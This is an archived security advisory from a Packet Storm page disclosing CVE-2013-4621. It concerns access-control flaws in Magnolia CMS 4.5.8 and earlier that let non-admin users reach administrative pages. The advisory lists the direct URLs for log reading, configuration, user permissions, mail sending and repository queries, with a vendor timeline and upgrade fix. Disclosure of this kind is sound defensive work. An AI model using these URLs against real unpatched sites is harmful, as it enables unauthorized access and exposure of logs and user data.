what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Magnolia CMS 4.5.8 Access Bypass

Magnolia CMS 4.5.8 Access Bypass
Posted Jun 25, 2013
Authored by Adrian Furtuna

Magnolia CMS versions 4.5.8 and below suffer from multiple access control vulnerabilities that allow a non-administrative user to access and execute administrative functionalities.

tags | exploit, vulnerability, bypass
advisories | CVE-2013-4621
SHA-256 | fb6c27a0797c4b1ac97ad5992f8eddfb9cd896a72f7e7d7b719810e87f85d694

Magnolia CMS 4.5.8 Access Bypass

Change Mirror Download
Subject:
======
Multiple access control vulnerabilities in Magnolia CMS, Community and
Enterprise editions

CVE ID:
=======
CVE-2013-4621

Summary:
========
A non-admin user (such as default users eric / peter) can access and
execute multiple administrative functionalities of the CMS by accessing
directly the specific URLs.

Product:
========
Magnolia CMS

Vendor:
=======
Magnolia International Ltd.

Affected versions:
==================
Magnolia CMS <= 4.5.8
Tested on: 4.5.8, 4.5.7 and 4.5.3, both Community and Enterprise editions

Not-affected version:
=====================
Magnolia CMS 4.5.9

Product information:
====================
Magnolia CMS is an open-source Web Content Management System that focuses
on providing an intuitive user experience in an enterprise-scale system.

Vulnerability details:
======================
The following functionalities can be accessed and executed by a non-admin
user based on the URL:

- View and set the log level of Magnolia
http://127.0.0.1:8080/magnoliaPublic/.magnolia/log4j

- Read Magnolia log files (can contain sensitive information)

http://127.0.0.1:8080/magnoliaPublic/.magnolia/pages/logViewer.html?command=displayFileContent&fileName=magnolia-error.log

http://127.0.0.1:8080/magnoliaPublic/.magnolia/pages/logViewer.html?command=displayFileContent&fileName=magnolia-debug.log

- View Magnolia configuration:
http://127.0.0.1:8080/magnoliaPublic/.magnolia/pages/configuration.html

- View permissions of Magnolia users. Also can be used for user enumeration
http://127.0.0.1:8080/magnoliaPublic/.magnolia/pages/permission.html

- Send arbitrary email messages
http://127.0.0.1:8080/magnoliaPublic/.magnolia/pages/sendMail.html

- View the list of installed modules

http://127.0.0.1:8080/magnoliaPublic/.magnolia/pages/installedModulesList.html

- Execute arbitrary queries in the repository (limited by the current
user's rights)
http://127.0.0.1:8080/magnoliaPublic/.magnolia/pages/jcrUtils.html


Vendor contact log:
===================
2013-04-25: Contacting vendor through support@magnolia-cms.com
2013-04-29: Vendor acknowledges the receipt of the advisory
2013-04-29: Vendor confirms the vulnerability
2013-06-03: Vendor releases version 4.5.9 which fixes the vulnerability


Credits:
========
This vulnerability was discovered by Adrian Furtuna
http://pentest-tools.com

Solution:
=========
Upgrade to the latest version of Magnolia CMS
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    29 Files
  • 21
    Aug 21st
    42 Files
  • 22
    Aug 22nd
    26 Files
  • 23
    Aug 23rd
    25 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close